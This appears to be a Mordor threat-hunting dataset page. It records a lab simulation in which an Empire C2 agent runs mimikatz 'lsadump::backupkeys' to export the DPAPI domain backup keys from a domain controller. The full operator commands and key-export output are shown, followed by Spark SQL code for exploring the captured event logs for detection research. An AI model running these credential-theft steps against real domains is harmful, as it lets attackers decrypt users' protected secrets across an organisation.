Empire Mimikatz Backup Keys

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/21

Tactics

[‘TA0006’]

Techniques

[‘T1003’]

Tags

[‘DPAPI’, ‘DPAPI Domain Backup key’, ‘RPC LSARPC’]

Dataset Description

This dataset represents adversaries retrieving the DPAPI Domain Backup Key from the DC via RPC LSARPC methods over SMB.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Threat Hunter Playbook

Domain DPAPI Backup Key Extraction

https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

mimikatz_lsadump_backupkeys

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
ALYH6ZB2 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4380   5/0.0    2020-10-22 18:24:28  http            

(Empire: agents) > interact ALYH6ZB2
(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/
cache*           command          dcsync_hashdump  golden_ticket    logonpasswords*  mimitokens*      purge            silver_ticket    
certs*           dcsync           extract_tickets  keys*            lsadump*         pth*             sam*             trust_keys*      
(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:MORDORDC.theshire.local /export
(Empire: powershell/credentials/mimikatz/command) > execute
[*] Tasked ALYH6ZB2 to run TASK_CMD_JOB
[*] Agent ALYH6ZB2 tasked with task ID 1
[*] Tasked agent ALYH6ZB2 to run module powershell/credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > 
Job started: 75WB4S

Hostname: WORKSTATION5.theshire.local / S-1-5-21-2323213074-4052461197-1785501644

  .#####.   mimikatz 2.2.0 (x64) #19041 Oct  4 2020 10:28:51
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > https://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::backupkeys /system:MORDORDC.theshire.local /export

Current prefered key:       {a0feda20-878f-4e68-ba74-d4df8f0191ab}
  * RSA key
        |Provider name : Microsoft Strong Cryptographic Provider
        |Unique name   : 
        |Implementation: CRYPT_IMPL_SOFTWARE ; 
        Algorithm      : CALG_RSA_KEYX
        Key size       : 2048 (0x00000800)
        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
        Exportable key : YES
        Private export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.keyx.rsa.pvk'
        PFX container  : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.pfx'
        Export         : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.der'

Compatibility prefered key: {0343c16b-26f1-4e2c-83ed-90e443b3bfca}
  * Legacy key
daef8bf857ba653c7c233a1156d0fb3c488487caf7b0cb1879f6f6fd4dc3877d
4ad77077efd018b07267585828f1e3a7e88abd203ca86d820bcd1f1f806426e2
71834ddd67073b1e581379be55a6dd97fecee5ff9cda881936209f35653a681e
444aedb87d2bef790e4b25084c4395372f358e226893731f621eb3f0f99153ab
9af4c25dd32010ffe1bcac8b7ba10c6163d97b85ee19653356624068b8f01476
77cb393bbf0fd4369a8a6982545aa2a81b70132b636218bdb9a7b7f7149d361c
45236e528672ec9defd57430cdc0264ad6d51669715d83be2b059ec162607603
834960f44601d4a2a02d901d67f7046b81adf702b48f8420598dd8e81fe8b1bc

        Export         : OK - 'ntds_legacy_0_0343c16b-26f1-4e2c-83ed-90e443b3bfca.key'
(Empire: powershell/credentials/mimikatz/command) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |3978 |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |3965 |
|MORDORDC.theshire.local    |Security                                |4658   |1049 |
|MORDORDC.theshire.local    |Security                                |4656   |525  |
|MORDORDC.theshire.local    |Security                                |4690   |525  |
|MORDORDC.theshire.local    |Security                                |4663   |508  |
|MORDORDC.theshire.local    |Windows PowerShell                      |800    |273  |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4103   |273  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |233  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |131  |
|MORDORDC.theshire.local    |Security                                |4703   |96   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |76   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |67   |
|MORDORDC.theshire.local    |Security                                |4634   |53   |
|MORDORDC.theshire.local    |Security                                |5156   |36   |
|MORDORDC.theshire.local    |Microsoft-Windows-PowerShell/Operational|4104   |34   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |34   |
|WORKSTATION6.theshire.local|security                                |5158   |30   |
|WORKSTATION5.theshire.local|security                                |5158   |28   |
|MORDORDC.theshire.local    |Security                                |4624   |28   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows